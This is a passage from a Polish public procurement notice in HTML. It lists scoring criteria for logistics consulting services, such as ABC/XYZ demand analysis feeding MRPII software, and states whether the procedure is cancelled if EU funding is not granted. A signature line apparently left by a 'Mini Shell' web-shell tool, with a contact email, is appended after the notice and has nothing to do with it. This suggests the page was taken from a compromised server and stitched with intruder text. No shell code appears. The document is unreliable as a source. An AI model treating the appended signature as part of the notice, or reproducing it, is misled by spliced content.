Sprzedażą (2,5pkt) realizowanych na rzecz Zleceniodawcy lub spełnieniem kryterium zadowolenia i odbioru usług poprzez wystawienie faktur lub rachunków i dokonanie przez rzeczonego Zleceniodawcę usług stosownych płatności; 8. Wykonanie z pozytywnym jakościowym skutkiem usług doradztwa logistycznego w zakresie analizy popytu ABC, XYZ w łańcuchu dostaw, których wynikiem jakościowym jest implikacja założeń do systemu oprogramowania logistycznego lub MRPII zarządzającego ścieżką automatyzacji przeliczeniowej uwzględniającego bieżący popyt w wielkości utrzymywania zapasu i pomiarów kosztów gromadzenia zapasu (10 pkt)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com